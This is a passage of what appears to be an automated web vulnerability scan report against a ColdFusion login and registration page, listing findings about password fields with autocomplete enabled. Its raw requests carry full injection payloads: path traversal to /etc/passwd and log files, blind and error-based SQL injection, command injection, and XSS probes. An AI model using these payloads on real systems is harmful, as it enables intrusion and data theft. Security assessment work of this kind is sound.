Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000009%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.161. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.162. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.163. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.164. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.165. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.166. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:02 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.167. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.168. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3b/*

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.169. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030));

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.170. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field with autocomplete enabled:

j_password

Request

Response

17.171. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.172. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=index.cfm%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=index.cfm%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.173. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.174. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.175. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.176. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


